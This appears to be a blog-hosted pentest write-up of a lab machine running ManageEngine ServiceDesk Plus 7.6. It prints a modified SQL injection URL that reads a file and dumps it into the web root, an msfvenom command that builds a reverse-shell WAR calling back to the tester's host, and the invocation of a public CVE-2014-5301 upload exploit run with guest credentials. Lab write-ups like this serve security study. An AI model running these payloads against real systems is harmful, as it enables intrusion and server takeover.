Pentest report on Helpdesk

Executive Summary

Helpdesk is a Windows 2008 Standard server which hosts ManageEngine ServiceDesk Plus (SDP) 7.6 web application, the ManageEngine SDP version suffers from multiple vulnerabilities, amongst multiple vulnerabilities we used two exploits.

  • Sql injection – We are able to read proof.txt from C:\Users\Administrator\Desktop\
  • Arbitrary file upload – We uploaded a malicious reverse shell java war file to gain access and got administrative privilege on Helpdesk.

the above two exploits were achieved with just a guest account.

Recommendation

It is recommended to patch ManageEngine ServiceDesk Plus to the latest version, disable guest account if not needed, if guest account is needed check with ManageEngine if change of username and password is viable.

Service Enumeration

TCPDescription
135MS RPC
139netbios-ssn
445MS SMB
3389Remote Desktop
8080ManageEngine ServiceDesk

Vulnerability exploited

SQL injection

To perform the exploits we first logon to ManageEngine SDP as guest, the account name and the password are the same.

Logon as guest
The guest account interface

The original PoC can be reference at: https://www.exploit-db.com/exploits/11793

This is the modified PoC:

http://192.168.x.43:8080/WorkOrder.do?woMode=viewWO&woID=WorkOrder.WORKORDERID=6)union select 1,2,3,4,5,6,7,":",load_file("c:\\users\\administrator\\desktop\\proof.txt"),":",11,12,13,14,15,16,17,18,19,1 into dumpfile 'C:\\ManageEngine\\ServiceDesk\\applications\\extracted\\AdventNetServiceDesk.eear\\AdventNetServiceDeskWC.ear\\AdventNetServiceDesk.war\\images\\loot.txt'/*

The PoC abuses MySQL query to write query result into a file – loot.txt, the query uses load_file function to read proof.txt and saves to loot.txt.

To view the content navigate to http://192.168.x.43:8080/images/loot.txt

the content is in the middle section separated by colons.

SQL injection is possible because the woID is not properly sanitized.

Arbitrary File upload

The reference of the vulnerability can be found in CVE-2014-5301. The directory traversal vulnerability is exploited to upload any file a person wishes to.

The directory traversal can be traverse to the jboss path (../../server/default/deploy) which directly deploys and executes java war file, a post request is made to /common/FileAttachment.jsp then the war file is uploaded to the jboss path and executes.

An automated python script is available to exploit this vulnerability: https://raw.githubusercontent.com/PeterSufliarsky/exploits/master/CVE-2014-5301.py

First generate a malicious java war file with msfvenom:

msfvenom -p java/shell/reverse_tcp lhost=192.168.x.x lport=8080 -f war -o shell.war

This war file will send connection to a multi handler server which I set up.

Multi handler server to receive staging connection.

Then run the python script to upload shell.war to Helpdesk.

./CVE-2014-5301.py 192.168.x.43 8080 guest guest shell.war
Execute the python script
Reverse connection is established.

The ManageEngine SDP was started with administrative rights (NT authority\System) and hence I can easily navigate to C:\Users\Administrator\Desktop\proof.txt.

Obtain proof.txt

Obtained proof.txt

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s